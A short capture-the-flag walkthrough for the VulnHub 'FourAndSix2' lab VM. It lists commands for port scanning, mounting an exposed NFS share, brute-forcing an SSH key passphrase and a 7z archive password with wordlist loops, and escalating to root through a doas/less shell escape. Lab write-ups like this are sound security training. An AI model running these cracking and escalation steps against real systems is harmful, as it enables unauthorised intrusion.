01x01
1/31/2019 - 12:45 PM
FourAndSix2
Today I will exploit the vulnerable image which called "FourAndSix2". Here is the url to download this image: https://www.vulnhub.com/entry/fourandsix-201,266/. we need to import the image to vmware once we downloaded it. now here we go.
step1 start the Metasploit
>> msfconsole
step2 scan ports
msf>> db_nmap 192.168.30.1/24
msf>> db_nmap 192.168.30.93
step3 exploit
We can review the result of scanning and we found that it exists nfs vulnerability
msf>> search nfs
msf>> use ....
msf>> apt install nfs-common
msf>> mkdir /nfstest
msf>> mount -t nfs 192.168.30.93:/home/user/storage /nfstest -o nolock
msf>>cp /nfstest/backup.7z ~/vulnhub/fourandsix2
and then we found backup.7z has password protection. so we upload it to https://www.lostmypass.com/ to get the password
step4 crack id_rsa
we found id_rsa and id_rsa.pub. but we can't use the id_rsa to login directly. we need to crack id_rsa
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
now we got the password: 12345678
step5 login with id_rsa
ssh -i id_rsa user@192.168.30.93
step6 find vulnerability for Privilge Escalation
>> find / -perm -u=s -type f 2>/dev/null
fourandsix2# cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
>> doas /usr/bin/less /var/log/authlog
and enter v key translate to vi model and enter !sh
finally, we got the flag: acd043bc3103ed3dd02eee99d5b0ff42
and we got two shell to crack id_rsa and 7z password
Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
magic command...